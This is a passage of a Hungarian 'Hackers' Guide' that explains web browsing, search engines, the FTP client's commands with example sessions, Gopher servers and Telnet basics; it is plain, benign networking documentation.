szóra lehetett rákattintani, amellyel átugorhattunk egy másik témára, vagy helyre,<br />
ami az adott szóhoz kötõdött. Ilyen lapokat ma már egyre kevesebbet találunk, ill.<br />
csak külön kérésre jelennek meg, ha keresõnkben beállítjuk, hogy csak a szöveget<br />
töltse le. A csak szöveges lapok beolvasása sokal gyorsabb.<br />
Egyre gyakoribbak azonban azok a lapok ahol a kapcsolati szó nem egy aláhúzott<br />
szó, hanem egy kép. Az egérmutatót (pointer) a képernyõn mozgatva megnézhetjük,<br />
hogy hová lehet kattintani. Ilyenkor a pointer alakja megváltozik, innen ismerjük föl a<br />
hivatkozásokat, linkeket. Ilyenkor érdemes elolvasni, hogy mivan az állapotsorba<br />
írva, mert megtudhatjuk, hogy egy másik fájl kerül beolvasásra errõl a szerverrõl,<br />
vagy átlépünk a Föld egy másik pontján levõ gépre.<br />
Sok esetben a hivatkozások mögött E-mail címek rejtõznek, ezt szintén az<br />
állapotsorból olvashatjuk le. Ha ezekre kattintunk, akkor a saját levelezõprogramunk<br />
indul el, amelyikkel levelet tudunk írni a megadott címre. A címzett adott, nekünk<br />
csak a levél tárgyát és szövegét kell megírni.<br />
Ma már hangállományokat is letölthetünk a web segítségével (.wav, .mid, .mod, stb.)<br />
sõt lehetõség van videók megtekintésére is. A rádióhallgatás a Real Audio<br />
segítségével jöhet létre ami lehetõvé teszi - mint ez a nevébõl is kitûnik - a valós<br />
119
Hackers’ Guide<br />
idejû lejátszást. Ezt a programot ma már megkapjuk a böngészõnkkel együtt, de a<br />
rádióállomások web-lapján is találunk egy kapcsolatot amellyel eljuthatunk a<br />
beszerzés helyére és onnan letölthetjük a programot.<br />
A KERESÕGÉPEK<br />
Ma már több keresõ is létezik, melyek mind arra szolgálnak, hogy megkönnyítsék a<br />
dolgunkat az Internet ma még elég kaoisztikus világában. A legnépszerûbb keresõk<br />
a Yahoo, az Alta Vista, az Excite és a Hotbot. Az elsõ magyar keresõ pedig Heureka<br />
névre hallgat. Ezekben a keresõkben tulajdonképpen bármit kereshetünk, nincs<br />
olyan témakör vagy szó amire ne dobnának ki egy pár találatot. A keresés arra is jó,<br />
hogy ujabb web-helyeket fedezzünk föl, így az érdeklõdési körünket bõvíthetjük, mert<br />
az információ forrása gyakorlatilag korlátlan.<br />
************************************************************************************************<br />
File Transfer Protocoll (FTP)<br />
Az FTP funkciója: file-ok másolása távoli és helyi gép között<br />
Szintaxis<br />
ftp [kapcsolók] [host]<br />
Kapcsolók<br />
-d<br />
Engedélyezi a debuggolást úgy, hogy bekapcsolja a `logging` jellemzot.<br />
-g<br />
kikapcsolja a metakarakter kiterjesztést a file-nevekben<br />
-i<br />
kikapcsolja az interaktív közlésmódot miközben több file-t másolunk.<br />
-n<br />
megakadályozza az autómatikus bejelentkezést a kezdeti kapcsolatteremtéskor.<br />
Egyébként az ftp megkeresi a $HOME/.netrc file-t, amely leírja a bejelentkezési- és<br />
az inicializációs processzeket a távoli host részére.<br />
-t<br />
felfüggeszti a csomagok nyomkövetését.<br />
120
-v<br />
Hackers’ Guide<br />
Kiírja a távoli server-rol érkezo összes választ, és statisztikát készít az adatátvitelrol.<br />
Ez az alapbeállítás mikor az ftp output-ja egy consol, vagy egy monitor.<br />
Használata<br />
Az ftp protokollt arra az esetre tervezték, ha adatot szeretnénk mozgagtni két olyan<br />
gép között, melyek különbözo file-rendszert használnak. Így, bár a protokoll nagyon<br />
rugalmas az adatátvitel tekintetében, nem képes átadni a file-attributumokat.<br />
Ezenfelül az ftp protokoll feltételez néhány dolgot az file-rendszer felépítésével<br />
kapcsolatban, és nem képes, vagy nem enged olyan dolgokat csinálni, mint például<br />
rekúrzívan másolni alkönyvtárakat.<br />
Megjegyezzük, hogyha OSF/1 rendszerek között dolgozunk (vagy egyéb rendszerek<br />
között, melyek kompatibilisak a UNIX operációs rendszerrel) és szükségünk lenne a<br />
file attributumok átvitelére, vagy szükségünk lenne alkönyvtárrendszerek rekurzív<br />
másolására, akkor használjuk az rcp parancsot.<br />
Az ftp parancs rendelkezik belso parancsokkal, melyekkel például listázhatjuk a távoli<br />
könyvtárakat, mozoghatunk a helyi vagy a távoli könytárrendszerben, másolhatunk<br />
több file-t egyszerre egy parancs kiadásával, létrehozhatunk, vagy éppen törölhetünk<br />
könyvtárakat, és kiléphetünk a helyi shell-be, és kiadhatunk shell parancsokat. Az ftp<br />
ezenkívül a biztonságra is ügyel, lehetoseget ad a távoli géphez jelszó küldésére, és<br />
engedélyezi az autómatikus belépést, adatmozgatást, illetve kilépést.<br />
Ha az ftp parancsot úgy indítjuk el, hogy nem adjuk meg a távoli gép nevét, akkor az<br />
ftp> promptot adja, és vár egy parancs begépelésére. Ha egy távoli géphez<br />
szeretnénk csatlakozni, akkor az open parancsot adjuk ki. Amikor az ftp megteremti<br />
a kapcsolatot a távoli géphez kéri a bejelentkezési nevet és a jelszót, mielott<br />
visszaadná az ftp> promptot. Az ftp hibát jelez, ha nincs jelszó definiálva a távoli<br />
gépen a bejelentkezési névhez.<br />
Ha az ftp sikeresen megteremtette a kapcsolatot a távoli géppel, megkeresi a helyi<br />
$HOME/.netrc file-t az aktuális vagy a home könyvtárban. Ha megtalálta, lefuttatja a<br />
a file-ban található bejelentkezési és inicializációs processzeket, makró definíciókat<br />
beállítja.<br />
Az ftp parancsértelmezoje, amely kezeli az összes ftp> promptnál begépelt<br />
parancsot, biztosít olyan lehetoségeket is, amelyekre más file mozgató program nem<br />
képes, mint például a file nevek paraméterként kezelése, makrók készítése,<br />
betöltése a $HOME/.netrc file-ból.<br />
A parancsértelmezo a következo szabályok szerint képes a file neveket<br />
argumentumként kezelni:<br />
• Ha a - (mínusz) jel szerepel az argumentumban, a standard inputot használja<br />
olvasásra, a standard outputot pedig az írásra.<br />
• Ha a file-névben az elso karakter | (függoleges vonal), akkor az argumentum<br />
fennmaradó részét úgy értelmezi, mint shell-parancsot.<br />
121
Hackers’ Guide<br />
• A get és az mget parancsok esetén, ha nem adjuk meg a helyi file nevet,<br />
akkor az meg fog egyezni a távol file nevével, mely módosulhat, ha a case,<br />
ntrans, nmap parancsokat használtuk elotte.<br />
• A put és az mput parancsok esetén, ha nincs meghatározva a távoli file neve,<br />
akkor az meg fog egyezni a helyi file nevével<br />
Megjegyezzük, hogy az ftp parancsértelmezoje nem támogatja a csöveket.<br />
Kilépéshez a bye, quit parancsok használatosak. Ha az adatátvitelt szeretnénk<br />
megszakítani, azt a Ctrl-c-vel tehetjük meg.<br />
Az ftp parancs alapesetben a Type-of-Service értékeit használja, melyek<br />
szükségesek az RFC1060-hoz. Ezek a következoek:<br />
ftp-control<br />
• Minimális várakozás<br />
ftp-data<br />
• Magas teljesítmény<br />
Ezeket a /etc/iptos file-ban tudjuk beállítani.<br />
Parancsok<br />
122<br />
Az allábbi ftp parancsokat az ftp> promptnál gépelhetjük be. Ha az<br />
argumentumban szóközök szerepelnek, akkor az argumentumot idézojelek<br />
közé kell zárni: ""<br />
![parancs[argumentumok ...]]<br />
Meghív egy interaktív shell-t a helyi gépen. Egy opcionális parancs egy vagy<br />
több argumentummal megadható.<br />
$ macro [argumentumok ...]<br />
Meghívja a megadott makrót, amelyet elozoleg definiáltunk a macdef<br />
paranccsal.<br />
? [parancs]<br />
Segítséget ad a megadott parancs használatáról. Ha nem adtunk meg<br />
argumentunként parancsot, akkor kilistázza az összes ftp-ben használható<br />
parancsot.<br />
account [jelszó]<br />
Küld egy kiegészíto jelszót, amelyet a távoli gép kérhet, ha hozzá szeretnénk<br />
férni az eroforrásaihoz. Ha nem adtunk meg jelszót, akkor azt promptnál kell<br />
begépelni, mely így nem jelenik meg a képernyon.<br />
append helyi_file [távoli_file]<br />
Hozzácsatolja a helyi file-t egy távoli gépen lévo file-hoz. Ha a távoli file nevét<br />
nem adtuk meg, akkor az meg fog egyezni a helyi file nevével, módosítva az<br />
ntrans, nmap által kiadott beállításokkal.<br />
ascii
Hackers’ Guide<br />
Az átvitel módját ASCII típusúra állítja. Ez az alapbeállítás, ha a távoli gép<br />
nem UNIX rendszeru. Az átvitel hatékonyabb lehet, ha a bináris átviteli módot<br />
használjuk.<br />
bell<br />
Minden egyes file-muvelet végrehajtása után csippant egyet a gép.<br />
binary<br />
Az átvitel módját binárisra állítja. Ez az alapbeállítás, ha a távoli gép UNIX<br />
rendszeru.<br />
bye<br />
Megszakítja a kapcsolatot a távoli géppel, és kilép az ftp-bol. Megegyezik a<br />
quit paranccsal.<br />
case<br />
Átállítja a nagybetu kisbetu megkülönböztetést. Amikor a case be van<br />
kapcsolva, akkor ha a távoli gépen lévo file-ok neveiben nagybetu szerepel<br />
kisbeture cseréli, mikor a helyi gépre másolja a file-t. Alapbeállításként ki van<br />
kapcsolva.<br />
cd távoli_könyvtár<br />
A távoli gépen megváltoztatja a munkakönyvtárat a megadott könyvtárra.<br />
cdup<br />
A távoli gépen a munkakönyvtárat a jelenlegi szülokönyvtárára állítja.<br />
close<br />
Megszünteti a kapcsolatot a távoli géppel, de nem lép ki az ftp-bol. A definiált<br />
makrókat törli. Megegyezik a disconnect paranccsal.<br />
cr<br />
Levágja a kocsi-vissza karaktert a kocsi-vissza/soremelés sorozatból, mikor<br />
ASCII módban másolunk file-okat. Ez a UNIX és OSF/1 alapú rendszerek<br />
miatt szükséges, mivel ott a recordok végét csak a soremelés karakter jelzi. A<br />
cr parancs ezt a lehetoséget ki/be kapcsolja.<br />
delete távoli_file<br />
Törli a megadott távoli file-t.<br />
debug [on | off]<br />
Kiír minden parancsot, melyet a távoli gépnek küld, a --> jel után, ha a debug<br />
on parancsot adtuk ki.<br />
dir [távoli_könyvtár][helyi_file]<br />
A távoli könyvtár tartalmát a megadott helyi file-ba írja ki. Ha távoli<br />
könyvtárnevet nem adtunk meg, akkor az aktuális munkakönyvtárat listázza ki,<br />
illetve ha nem adtuk meg a helyi file nevét, akkor a helyi terminálra ír ki.<br />
disconnect<br />
Lásd close utasítás.<br />
form formátum<br />
123
Hackers’ Guide<br />
124<br />
Meghatározza az átvitel formátumát. Az egyetlen lehetséges a non-print<br />
formátum.<br />
get távoli_file [helyi_file]<br />
A távoli file-t a helyi gépre másolja. Ha a helyi file neve nincs megadva, akkor<br />
az meg fog egyezni a távoli file nevével, módosítva a case, ntrans, nmap<br />
parancsok beállításaival.<br />
hash<br />
Mikor a hash be van kapcsolva, az ftp minden egyes átmozgatott adatblokk<br />
után (1024byte) egy # jelet tesz.<br />
help [parancs]<br />
Lásd ? parancsot.<br />
lcd [könyvtárnév]<br />
Megváltoztatja a munkakönyvtárat a helyi gépen. Ha nem adtunk meg<br />
könyvtárnevet, akkor a home-könyvtárunkat állítja be munkakönyvtárnak.<br />
ls [távoli_könyvtár] [helyi_file]<br />
Lásd a dir parancsot.<br />
macdef makró<br />
Makró definiálása. A rákövetkezo sorok az üres sorig (két egymásutáni<br />
soremelés karakter) a makró szövegeként lesz elmentve. Összesen 16 makrót<br />
definiálhatunk, melyek legfeljebb 4096byte hosszúak lehetnek. A makrók<br />
addig érvényesek, míg újra nem definiáljuk oket, vagy ki nem adunk egy close<br />
parancsot.<br />
A speciális karaktereknek ($ (dollár jel) és a \ (backslash jel)) speciális<br />
jelentésük van. A $ jel utáni szám(ok) a makró argumentumait jelölik. A \ jelet<br />
akkor használjuk, ha speciális jelet szeretnénk használni, annak speciális<br />
jelentése nélkül.<br />
mdelete távoli_file-ok<br />
Távoli file-ok törlése.<br />
mdir [távoli_könyvtár ... helyi_file]<br />
A távoli könyvtár tartalmát a helyi file-ba írja. Ha a távoli könyvtár nevébe<br />
joker-karaktereket adtunk meg, akkor szükséges a helyi file megadása. Ha a<br />
távoli könyvtár argumentum könyvtárak listája, szóközökkel elválasztva, az<br />
utolsó argumentumnak a helyi file-nak kell lennie, vagy a - (mínusz)<br />
karakternek.<br />
mget távoli_file ...<br />
A távoli file(okat) a helyi munkakönyvtárba másolja, módosítva azok neveit a<br />
case, ntrans, nmap beállításainak megfeleloen. A másolást a type, form,<br />
mode, structure beállításainak megfeleloen végzi.<br />
mkdir [távoli_könyvtár]<br />
Létrehoz egy könyvtárat a távoli gépen, az argumentumban megadott névvel.<br />
mls [távoli_könyvtár ... helyi_file]
Hackers’ Guide<br />
A távoli könyvter tartalmát rövidített formában kilistázza a helyi file-ba. Ha a<br />
távoli könyvtár nevében joker-karakterek szerepelnek, illetve ha több távoli<br />
köyvtárat is megadtunk, szükséges a helyi file megadása.<br />
mode [mód]<br />
Az átvitel módját állítja be. Az egyetlen lehetséges mód a stream mód.<br />
modtime [távoli_file]<br />
Megmutatja a távoli file utolsó módosításának idejét.<br />
mput [helyi_file ...]<br />
A helyi file-t a távoli gépre másolja. A fileneveket az ntrans, nmap<br />
parancsoknak megfeleloen módosítja. Az adatátvitel a type, form, mode<br />
beállításainak megfeleloen történik.<br />
nlist [távoli könyvtár] [helyi_file]<br />
Kilistázza a távoli könyvtár tartalmát. Ha ezt argumentumban nem adtuk meg,<br />
akkor a munkakönyvtárat listázza ki. Ha nincs helyi file megadva, akkor a<br />
monitorra listáz.<br />
nmap [bemeneti_minta kimeneti_minta]<br />
Beállítja vagy kikapcsolja a file-nevek módosítását. Ha nem adunk meg<br />
argumentumot, akkor kikapcsolja. Ha adtunk meg argumentumot, akkor az<br />
mget, mput utasítások használatakor és a get utasítás esetén ha nem adtunk<br />
meg cél file-nevet, akkor a forrás file nevét a beállításoknak megfeleloen<br />
módosítja.<br />
A bemeneti mintában megadott változók a forrás file alapján veszik fel<br />
értéküket. Ezek a változók: $1 ... $9. Például ha a bemeno minta mydata.dat,<br />
akkor $1 értéke mydata, míg $2 értéke dat lesz.<br />
A kimeneti minta változói határozzák meg a cél file nevét. Itt a $0 az eredeti<br />
file nevet jelenti. Például a következo parancs a myfile.data néven el a<br />
myfile.data vagy myfile.data.old nevu file-okat, illetve myfile.file néven a myfile<br />
file-t, illetve myfile.myfile néven a .myfile file-t:<br />
nmap $1.$2.$3 [$1,$2].[$2,file]<br />
ntrans [bemneti_karakterek [kimeneti_karakterek]]<br />
Beállítja vagy kikapcsolja a file nevekben történo karaktercseréket. Ha nem<br />
adtunk meg argumentumot, akkor kikapcsolja a cserét. Ha adtunk meg<br />
argumentumot, akkor az mget, mput, get, put parancsok esetén a cél file neve<br />
a beállításoknak megfeleloen módosul. Ha a file nevében szereplo karakter<br />
megegyezik a bemeneti karakterekkel, akkor azt az ftp kicseréli a kimeneti<br />
karakterekre.<br />
open host [port]<br />
Kapcsolatot létesít a host-on található FTP szerverrel. Ha a port számát<br />
megadtuk, akkor a kapcsolat azon a porton keresztül veszi fel. Ha az<br />
automatikus bejelentkezést beállítottuk (a -n kapcsolóval), akkor az ftp<br />
automatikusan bejelentkezik az adott szerverre.<br />
prompt<br />
125
Hackers’ Guide<br />
126<br />
Ki/bekapcsolja az interaktív promptot. Ha ez be van kapcsolva (ez az<br />
alapállapot), akkor az ftp visszakérdez, ha több file-t mozgatunk egyszerre,<br />
máskülönben végrehajtja az utasítást kérdés nélkül.<br />
proxy [parancs]<br />
Végrehajtja a parancsot ehu másodlagos kapcsolaton. A proxy segítségével<br />
mozgathatunk file-okat két távoli server között. Használata elott egy távoli<br />
serverre már be kell jelentkeznünk az open paranccsal. A következo<br />
parancsok másként muködnek proxy használatával:<br />
• az open parancs nem definiálja az új makrókat.<br />
• a close parancs nem törli a már definiált makrókat.<br />
• get, mget, put, mput, append parancsok az elsodleges és a<br />
másodlagos kapcsolat között mozgatják a file-okat.<br />
put helyi_file [távoli_file]<br />
Átmásolja a helyi file-t a távoli gépre. Ha nem adjuk meg a távoli file<br />
argumentumot, akkor annak neve meg fog egyezni a helyijével, módosítva az<br />
ntrans, nmap által beállítotakkal. Az átvitel módját a form, mode, type,<br />
structurebeállításainak megfeleloen történik.<br />
quit<br />
Lásd bye parancsot.<br />
quote szöveg<br />
Elküldi a szöveget szó szerint a távoli gépnek.<br />
recv távoli_file [helyi_file]<br />
Lásd get parancs.<br />
reget távoli_file [heyli_file]<br />
Ugyanúgy muködik, mint a get parancs kivéve, ha a helyi file már létezik, és<br />
kisebb méretu, mint a távoli file, akkor megpróbálja a helyi file-hoz hozzáfuzni<br />
a hiányzó részt. Ez akkor lehet hasznos, ha az adatátvitel megszakadt, és azt<br />
folytatni szeretnénk.<br />
remotehelp [parancs]<br />
Segítség kérése a távoli FTP servertol.<br />
rename mit mire<br />
File átnevezése a távoli gépen.<br />
reset<br />
Törli a válaszvonalat, újraszinkronizálja a kapcsolatot.<br />
rmdir távoli_könyvtár<br />
Törli a távoli gépen a megadott könyvtárat.<br />
runique<br />
Be/kikapcsolja a file-név módosítást, ha a get, mget paranccsal olyan file-t<br />
szeretnénk athozni, mellyel azonos nevu már létezik a munkakönyvtárban. Ha<br />
kikapcsoljuk (ez az alapállapot), akkor ilyen esetekben felülírja a helyi file-t. Ha
Példák<br />
Hackers’ Guide<br />
bekapcsoljuk, az ftp azonos file-nevek esetén a cél file nevét kiegészíti.1 , .2<br />
,.... jelekkel.<br />
send helyi_file [távoli_file]<br />
Lásd get parancs.<br />
sendport<br />
Ki/bekapcsolja az FTP PORT utasítások használatát. Alapállapotan ez be van<br />
kapcsolva.<br />
size távoli_file<br />
Megadja a távoli file méretét byte-okban.<br />
status<br />
Kiírja az ftp jelenlegi státuszát.<br />
struct [szerkezet]<br />
Beálltja az átvitel szerkezetét. Az egyetlen szerkezettipus a file tipus.<br />
sunique<br />
Ha a put, mput utasítással olyan file-t másolunk a távoli szerverre, melynek<br />
nevén már létezik ott file, akkor a sunique kiadása után a file nevet módosítja<br />
az ftp, míg alapállapotban felülírja azt.<br />
system<br />
Megmutatja milyen operációs rendszer fut a távoli gépen.<br />
tenex<br />
Az adatátvitel tipusát olyanra átállítja, mely megfelel a TENEX tipusú<br />
gépeknek.<br />
trace<br />
Be/kikapcsolja a csomagok nyomkövetését.<br />
type [tipus]<br />
Az adatátvitel tipusát állítja be. Ha argumentum nélkül adjuk ki, kiírja a<br />
jelenlegi tipust.<br />
user [jelszó] [account]<br />
Azonosítja a helyi felhasználót a távoli gép számára. Ha a jelszót vagy az<br />
account-ot nem adtuk meg, és szükség van rá, akkor az ftp megkérdezi azt.<br />
Ha az autómatikus bejelentkezés be van kapcsolva, akkor ez autómatikusan<br />
megtörtének.<br />
verbose<br />
Ki-bekapcsolja a verbose módot. Ez alapállapotban be van kapcsolva, ekkor<br />
az ftp kiírja a távoli szerver válaszait, illetve statisztikát készít az adatátvitelrol.<br />
$ ftp ural2.hszk.bme.hu<br />
Connected to ural2.hszk.bme.hu<br />
220 host2 FTP server (Version SunOS 5.6 on 14:40:27) ready.<br />
127
Hackers’ Guide<br />
Name (ural2.hszk.bme.hu:nagy): na218<br />
331 Password required for na218<br />
Password:<br />
230 User na218 logged in.<br />
Remote system type is UNIX.<br />
Using binary mode to transfer files.<br />
ftp> pwd<br />
257 "/home/a/stu/na218" is current directory.<br />
ftp> ls<br />
200 PORT command successful.<br />
150 ASCII data connection for /bin/ls (152.66.83.28,1680) (0 bytes).<br />
total 4904<br />
drwx--x--x 4 na218 students 512 Dec 15 17:06 .<br />
drwxr-xr-x 1100 root root 17920 Sep 15 14:17 ..<br />
-rw-r--r-- 1 na218 students 0 Dec 4 15:06 .addressbook<br />
-rw-r--r-- 1 na218 students 2285 Dec 4 15:06 .addressbook.lu<br />
-rw-r--r-- 1 na218 students 939 Dec 19 10:04 .bash_history<br />
-rw------- 1 na218 students 0 Dec 4 15:09 .mc.hot<br />
-rw-r--r-- 1 na218 students 0 Dec 4 15:09 .mc.ini<br />
226 ASCII Transfer complete.<br />
ftp> get .mc.hot testfile.tmp<br />
local: testfile.tmp remote: .mc.hot<br />
200 PORT command successful.<br />
150 Binary data connection for .mc.hot (152.66.83.28,1709) (0 bytes).<br />
226 Binary Transfer complete.<br />
ftp> quit<br />
221 Goodbye.<br />
$<br />
$ ftp test<br />
Connected to test.abc.org<br />
220 test FTP server (Version ...) ready.<br />
Name (test:fred): msith<br />
530 User msith unknown<br />
ftp> user smith<br />
331 Passwd required for smith<br />
Password:<br />
230 User smith logged in<br />
ftp><br />
$ ftp<br />
ftp> open host1<br />
Connected to host1.abc.org<br />
220 host1 FTP server (Version ...) ready.<br />
Name (host1:fred):<br />
331 Passwd required for fred<br />
Password:<br />
230 User fred logged in<br />
ftp><br />
Thanx: Nagy Attila<br />
128
Hackers’ Guide<br />
************************************************************************************************<br />
GOPHER<br />
Az Internet oly nagy, és a tárolt informáciú mennyiség oly mértékben nõ, hogy az<br />
adatrengetegben valú eligazodáshoz állandúan újabb és újabb felderítõ, rendszerezõ<br />
eszköz fejlesztése szükséges. Az egyik legsokoldalúbb ilyen navigációs program a<br />
Gopher. Alapkoncepciója szerint minden Gopher párbeszéd egy menü felkínálásával<br />
kezdõdik, amelynek valamelyik sorát kiválasztva ujabb almenüket (azok valamelyik<br />
sorát kiválasztva esetleg ujabb almenüket), majd a fa legalsó szintjén fájlokat vagy<br />
szolgáltatásokat lehet kiválasztani. A menüknek ez a hierarchikus mélyítése<br />
tetszõlegesen folytatható. Attól függõen, hogy milyen számítógéprendszert<br />
használunk a Gopher elérésére, elõfordulhat, hogy nem tudunk minden információt<br />
megjeleníteni vagy hasznosítani. Például a speciális grafikus képek megjelenítése,<br />
vagy az audio fájlok lejátszása csak megfelelõ számítógépes környezetben<br />
lehetséges.<br />
A Gopher szervereknek két fõ tipusa van: az Egyetemi Informáciús Rendszer<br />
(Campus Wide Information System, azaz CWIS), és a nagyközönség számára<br />
szolgáló információs szerver. A CWIS-ek általában a diákok, az egyetemi kar vagy<br />
szervezet tagjai érdeklõdésének megfelelõ információkat tartalmazzák, az olyan<br />
közérdekû tudnivalók mellett, mint például az egyetemi események, tanfolyami<br />
információk, gyakran más Gopherekre vonatkozú utalásokat is biztosítanak, amelyek<br />
között a nagyközönséget kiszolgáló információs szerver, vagy más campus<br />
közösségek különleges információkat is szolgáltathat, mint például a Wisconsini<br />
Egyetem (Parkside) dalszöveg szervere, idõjárás-elõrejelzés, ill. archivált levelezési<br />
listák és hírcsoportok.<br />
A GOPHER MÛKÖDÉSE:<br />
A Gopher az un. kliens-szerver arcitectúrán alapul, tehát van Gopher kliens- és<br />
Gopher szerverprogram. A Gopher szerverprogram azokon a gazdaszámítógépeken<br />
fut, amelyek az informáciút szolgáltatják, a Gopher kliensprogram pedig a Gopher<br />
szerveren tárolt informáciúk elérésére szolgál. A kliensprogram fogadja a felhasználú<br />
billentyû leütéseit, megjeleníti a menüket, fogadja és megjeleníti a dokumentumokat<br />
és minden olyan egyéb mûveletet elvégez, amihez a szerver nem szükséges. A<br />
szerverprogram várja a kliensek menü- és dokumentumigényeit, és a kérések<br />
teljesítése után "nyugalmi állapotba" tér vissza.<br />
Ennek az elrendezésnek az az egyetlen hátránya, hogy néha bizonyos<br />
dokumentumok vagy menük csak hosszú idõ után jelennek meg a képernyõn. Ennek<br />
az az oka, hogy a Gopher világában kalandozva, valószínûleg számos különbözõ<br />
szerverrel kapcsolatba kerülünk, annak ellenére, hogy végig ugyanazt a<br />
kliensprogramot használjuk. Elõfordulhat, hogy ezek a szerverek nagyon<br />
129
Hackers’ Guide<br />
népszerûek, vagy lassú hálózati kapcsolattal rendelkeznek, vagy egyszerûen<br />
meghibásodtak és azért nem mûködnek.<br />
A Gopher kliens programot elindítva máris megkezdhetjük barangolásunkat a<br />
Gopher-térben. A Gopher kezelése roppant egyszerû, egérrel ill. kurzorral tudunk<br />
mozogni a menükben, és Enter-el tudunk választani a minket érdeklô témák közül.<br />
Amennyiben a Netscape Navigatort használjuk, akkor ugyanúgy dolgozhatunk mint a<br />
http vagy ftp protokollok alatt.<br />
A Gopher alapbeállításánál érdemes a minessotai gopherhez csatlakozni, ahonnan a<br />
világ bermely Gopherszerveréhez könnyedén eljuthatunk. Ha ezeken a helyeken<br />
nem találunk semmi érdekeset, akkor egy olyan menüpontot kell keresnünk amely<br />
más Gopher szerverek felé mutat elágazást. (pl. All the gopher servers in the world,<br />
stb.) Itt aztán kedvünkre válogathatunk A Gopher szó angolul egyébként hörcsögöt<br />
jelent...<br />
GOPHER SZERVEREK<br />
gopher://ora.com (könyvek)<br />
gopher://ftp.spies.com (könyvek)<br />
gopher://chronicle.merit.edu (újságok)<br />
gopher://gopher.netsys.com:2100 (újságok)<br />
gopher://krakatoa.jsc.nasa.gov (NASA)<br />
gopher://naic.nasa.gov (NASA)<br />
gopher://technology.com (NASA)<br />
gopher://gopher.iif.hu (Magyar gopher szerver)<br />
************************************************************************************************<br />
MI A TELNET<br />
A Telnet lényege, hogy a saját számitógépedről be tudsz jelentkezni egy<br />
másik(mindegy, hogy a világ melyik részén lévő) számitógépre. Az FTP-vel és<br />
aGopher-rel ilyet már csináltál, de akkor csak az ott lévő adatokat érted el.Telnet<br />
esetében programokat is futtathatsz a távoli (remote) gépen.<br />
MIRE JÓ<br />
A klasszikus (és legkevésbé gyakori) felhasználás, hogy ha például kűlföldön vagy,<br />
bármelyik gépről be tudsz jelentkezni az Internet szolgáltatód gépére,és el tudod<br />
olvasni a leveleidet, leveleket tudsz irni stb, anélkűl, hogy nemzetközi telefonhávást<br />
végeznél, és abból addóan, hogy egy programot tudsz a távoli gépen futtatni, a<br />
lehetőségek határtalanok. Van telnet site, ami adatbázisokhoz ad hozzáférést,<br />
kereshetsz benne, rendezheted, bővitheted. Van, ahol egy élő beszélgetésbe<br />
kapcsolódhatsz be.<br />
130
Hackers’ Guide<br />
Többszereplős, világméretű játékokat játszhatsz, ujságokatolvashatsz, szavak<br />
helyesirását ellenőrizheted, szinonimákat kérhetsz hozzájuk, és mivel vannak nálam<br />
kreativabb emberek is, amit akarsz, azt megtalálod.<br />
TELNET CIMEK<br />
Akárcsak a levelezősnél, vagy az FTP-nél, itt is nevekkel (vagy számukkal)<br />
hivatkozhatsz a gépekre. Ebből adodoan a Telnet cimek valahogy ugy néznek ki:<br />
fedworld.gov fedix.fie.com geophys.washington.edu<br />
A legtöbb Internet cim enged Telnet elérést, viszont általában szükséged van egy<br />
usernévre és egy jelszora. Ha az adott cégnél van userneved, akkorcélszerű azt<br />
használnod, hiszen a regisztrált felhasználoknak mindig több joguk van, mint a<br />
"vendégeknek". Ha nincs userneved, rendszertől függően használhatod a GUEST,<br />
vagy<br />
VISITOR loginnevet. Van szerver, ahol bizonyos szolgáltatásokat csak a megfelelő<br />
login névvel érhetsz el. Például lehet, hogy ha ugyanarra a szerverre GAMES-ként<br />
jelentkezel be, akkor teljesen mást látsz, mintha BUSINESS-ként. A publikus<br />
szerverek bejelentkezés elött általában kiirják, hogy milyen usernévvel mit érhetsz el.<br />
Erre mindjárt nézünk egy példát, ha majd a Telnet session pontos menetét nézzük<br />
meg.<br />
"PORT" SZÁM<br />
Találkozhatsz olyan Telnet cimekkel is, amiknek a végén egy szám található,<br />
például:<br />
seabass.st.usm.edu 23 cybernet.cse.fau.edu 2010<br />
A cimek utáni szám egy "port" szám. Ennek semmi köze a számitógépek fizikai<br />
portjához. A port számok egy-egy programot jelentenek. Ha port számot is megadsz<br />
egy telnet session indátásakor, akkor bejelentkezés után egyből az adott program<br />
indul el.<br />
A szokásos port szám a 23. (Standard login.)<br />
TELNET SESSION<br />
Az első lépés, hogy elinditasz egy Telnet programot.<br />
Ezután meg kell adnod, hogy milyen cimre szeretnél bejelentkezni. (Egyes<br />
programoknak ezt már inditáskor is megadhatod a parancssorban.) Ezt,<br />
programtólfüggően az<br />
OPEN <br />
vagy a<br />
TELNET <br />
paranccsal, esetleg egy menüből kiválasztva teheted meg. A különböz? Telnet<br />
programok eddig térhettek el, a Telnet session többi része azonos lesz.<br />
Miután sikeresen rákapcsolodtál a távoli gépre, információt kapsz arról, és egy ilyen<br />
sorral is találkozol:<br />
131
Hackers’ Guide<br />
Escape character is ...<br />
A ... helyén lévő karatketkombináciával szakithatod meg a telnet session-t, ekkor<br />
telnet parancsmódba lépsz. A parancsmódrol mindjárt beszélünk. Ezt az escape<br />
character-t jegyezd meg, mindjárt szükséged lesz rá.<br />
A következő lépés, hogy bejelentkezz. Általában meg kell adnod a userneved és a<br />
jelszavad. Ha egy publikus elérésű rendszerre kapcsolodtál rá, akkor ez a lépés<br />
kimarad.<br />
Gyakori még az a megoldás is, hogy usernévként egy adott szolgáltatósnevét kell<br />
beirnod, ilyenkor nem kér a gép jelszót. Hogy milyen szolgáltatások vannak az adott<br />
gépen, azt vagy neked kell valahonnan tudnod,vagy belépés elött elolvashatod.<br />
Hogy belépés után hol mit találsz, azt nem tudjuk leirni, mert mindegyik rendszer<br />
más.<br />
TELNET PARANCSOK<br />
A távoli számitógéppel való kapcsolatfelvétel legegyszerűbb módja, ha a telnet kliens<br />
programot, paraméterként az elérni szándokozott távoli gép teljes Internet nevével<br />
vagy cimével megivjuk. Az IP cim ismerete hasznos lehet hibás névszerver esetén.<br />
Saját hálózaton belűl a teljes név helyett elegendő csak a gép neve is. Ha a<br />
kapcsolat létrejött, akkor a továbbiakban ugyanigy dolgozhatunk, mintha annak egyik<br />
terminálja mellett űlnénk, azaz mindazokat az utasitásokat használhatjuk, amelyeket<br />
az adott gépen lokálisan is kiadhatnánk. A kapcsolni kivánt gép megadásához<br />
megvalositástól függően vagy prompt-ot kapunk, vagy OPEN paranccsal nyithatjuk<br />
és CLOSE paranccsal zárhatjuk le a távoli géppel a kapcsolatot. Ha az utobbi<br />
megoldást használjuk, akkor a CLOSE után még a telnet programban vagyunk és<br />
ebből a QUIT utasitással léphetünk ki.<br />
CLOSE - lezárja a jelenlegi kapcsolatot<br />
DISPLAY - megnyitja az operácios paramétereket<br />
MODE - megprobál line-to-line vagy character-a-time modba lépni<br />
OPEN - egy oldalhoz csatlakozik<br />
